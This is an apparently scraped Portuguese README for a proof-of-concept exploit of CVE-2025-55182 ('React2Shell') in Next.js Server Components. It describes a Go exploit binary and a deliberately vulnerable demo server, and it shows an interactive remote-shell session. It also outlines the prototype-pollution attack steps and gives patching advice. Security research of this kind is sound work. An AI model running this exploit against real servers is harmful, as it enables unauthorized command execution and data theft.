
Este projeto fornece uma demonstração totalmente funcional da CVE-2025-55182 (React2Shell) - uma vulnerabilidade crítica de execução remota de código em React Server Components e Next.js.
Este projeto fornece uma demonstração totalmente funcional do CVE-2025-55182 (React2Shell) — uma vulnerabilidade crítica de Execução Remota de Código em React Server Components e Next.js.
Status: ✅ FUNCIONANDO — Alcança execução real de comandos em servidores vulneráveis
CVE-2025-55182 (executável compilado de 7.8MB)📥 Baixar Vídeo de Demonstração (5.6MB) — Clique para baixar e ver o exploit em ação
O que a demonstração mostra:
cd exploited-server
npm run dev
# Server starts on http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# When prompted:
Target: localhost:3001
Comandos Básicos:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Operações de Arquivo:
subh@rce $ touch hello.txt
[+] Created: hello.txt
subh@rce $ vi hello.txt
[i] Enter new content (type 'EOF' on a line by itself to finish):
Hello World!
EOF
[+] File saved: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] File written
subh@rce $ rm hello.txt
[+] Removed: hello.txt
Informações do Sistema:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Sair:
subh@rce $ exit
Este projeto demonstra:
✅ Exploração Real — RCE realmente funcional em sistemas vulneráveis
✅ Pesquisa de Segurança — Compreendendo vulnerabilidades de frameworks web modernos
✅ Desenvolvimento Go — Compilando e usando ferramentas de segurança
✅ Análise de Vulnerabilidades — Pesquisa de CVEs e técnicas de exploração
✅ Divulgação Responsável — Práticas éticas de teste de segurança
react-2-shell-demo/
├── CVE-2025-55182 # Compiled Go exploit binary
├── main.go # Go source code
├── exploited-server/ # Vulnerable Next.js app
│ ├── app/
│ │ ├── actions.ts # Server Actions (vulnerable)
│ │ └── page.tsx # Warning UI
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Documentation
O CVE-2025-55182 explora desserialização insegura em React Server Components:
__proto__Function()1. Craft multipart payload with malicious chunks
2. Send to Next.js Server Actions endpoint
3. Trigger prototype pollution via __proto__:then
4. Invoke Function() constructor with command
5. Execute code and return output via redirect
6. Parse result from X-Action-Redirect header
AVISOS CRÍTICOS:
README.md — Este arquivoGO_EXPLOIT_USAGE.md — Uso detalhado do exploitVULNERABLE_SERVER.md — Guia de configuração do servidorEXPLOITATION_GUIDE.md — Análise técnica aprofundadaUSAGE.md — Exemplos de uso e comandosnpm run dev em exploited-server)./CVE-2025-55182)Este projeto demonstra com sucesso:
Para Sistemas de Produção:
Atualize imediatamente para versões corrigidas:
Rotacione segredos se expostos antes de 4 de dezembro de 2025
Monitore os logs para atividades suspeitas de Server Actions
Audite aplicações que usam Server Components
@subhdotsol — Para fins educacionais e de pesquisa em segurança
Este código é apenas para fins educacionais e de testes de segurança autorizados.
Lembre-se: Sempre obtenha autorização adequada antes de testar. Use com responsabilidade! 🔒